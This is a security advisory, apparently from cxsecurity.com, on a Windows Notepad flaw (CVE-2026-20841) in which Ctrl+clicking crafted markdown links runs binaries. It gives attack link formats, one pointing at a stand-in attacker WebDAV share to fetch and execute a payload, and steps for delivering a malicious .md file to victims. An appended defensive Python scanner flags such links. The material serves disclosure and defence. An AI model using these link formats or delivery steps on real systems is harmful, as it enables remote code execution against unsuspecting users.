Windows Notepad App (Store Version) - Remote/Local Code Execution via Markdown Link

2026.03.02
Credit: nu11secur1ty
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Windows Notepad App (Store Version) - Remote/Local Code Execution via Markdown Link
# Date: 2026-02-26
# Exploit Author: nu11secur1ty
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://apps.microsoft.com/detail/9msmlrh6lzf3
# Version: Windows Notepad App versions 11.0.0 through 11.2510.14.0
# Tested on: Windows 11 (Notepad 11.2510.14.0)
# CVE: CVE-2026-20841
# CVSS: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

Description:
The Windows Notepad App (Microsoft Store version) fails to properly validate protocol handlers in markdown links. When a user Ctrl+Clicks a crafted link in a .md file, Notepad passes the raw URI to ShellExecuteExW() without sufficient filtering. This allows execution of arbitrary binaries in TWO distinct attack scenarios:

1. REMOTE CODE EXECUTION (RCE) - Network Scenario:
   - Attacker hosts payload on WebDAV/SMB share
   - Link format: `file:///\\attacker@port\DavWWWRoot\payload.py`
   - Windows fetches and executes remote payload when clicked
   - Confirmed by Microsoft: "load and execute remote files"

2. LOCAL CODE EXECUTION - Offline Scenario:
   - Attacker with local access executes system binaries
   - Link format: `file://C:/Windows/System32/cmd.exe`
   - No network required - payloads already on disk

Affected versions: 11.0.0 through 11.2510.14.0
Fixed in: 11.2510.14.0+ (requires manual Store update)
Note: The patch adds a warning dialog but does NOT block execution

Usage:
1. Modify the attacker IP in remote payloads to your machine
2. Run the script to generate malicious .md file
3. Host payloads on WebDAV/SMB server (for remote attack)
4. Deliver .md file to target
5. Victim opens it in vulnerable Notepad and Ctrl+Clicks any link

# Exploit:
[href](https://github.com/nu11secur1ty/Windows11Exploits/blob/main/2026/CVE-2026-20841/exploit.md)
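For triage on the defensive side, the following added example (not part of the original advisory or the author's exploit) scans Markdown text for link targets of the kinds described above: `file:` URIs, UNC paths, local drive paths and any other scheme outside an allowlist. The allowlist, the function names and the sample document are assumptions made for this example.

```python
import re

# Schemes considered safe to open from a document (assumption for this example).
ALLOWED_SCHEMES = {"http", "https", "mailto"}
# Markdown link forms: [text](target), <scheme:target>, and "[ref]: target".
LINK_PATTERNS = (
    re.compile(r"\[[^\]]*\]\(\s*<?([^)\s>]+)"),
    re.compile(r"<([A-Za-z][A-Za-z0-9+.-]*:[^>\s]+)>"),
    re.compile(r"^\s{0,3}\[[^\]]+\]:\s*<?([^\s>]+)"),
)
SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")

def classify(target):
    """Return why a link target is risky, or None if it looks benign."""
    if target.startswith(("\\\\", "//")):
        return "UNC or scheme-relative path"
    m = SCHEME.match(target)
    if not m:
        return None  # relative path or #anchor
    scheme = m.group(1).lower()
    if len(scheme) == 1:
        return "local drive path"  # e.g. C:\... parsed as a one-letter scheme
    if scheme in ALLOWED_SCHEMES:
        return None
    return f"scheme '{scheme}' not in allowlist"

def scan_markdown(text):
    """Return sorted (line_number, target, reason) for every risky link."""
    findings = set()  # a set, so one link matched by two patterns is reported once
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern in LINK_PATTERNS:
            for m in pattern.finditer(line):
                reason = classify(m.group(1))
                if reason:
                    findings.add((lineno, m.group(1), reason))
    return sorted(findings)

# Constructed sample document; the host name is a placeholder.
SAMPLE = r"""# Notes
[docs](https://example.com/guide)
[tool](file://C:/Windows/System32/cmd.exe)
[share](file:///\\files.example.invalid\DavWWWRoot\report.py)
[readme](./README.md)
[ref]: \\files.example.invalid\share\setup.exe
"""

if __name__ == "__main__":
    for lineno, target, reason in scan_markdown(SAMPLE):
        print(f"line {lineno}: {target} ({reason})")
```

The same allowlist check can sit in a mail or file-share gateway that quarantines `.md` attachments with any finding, since the advisory notes the patched version only warns and does not block.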


Copyright 2026, cxsecurity.com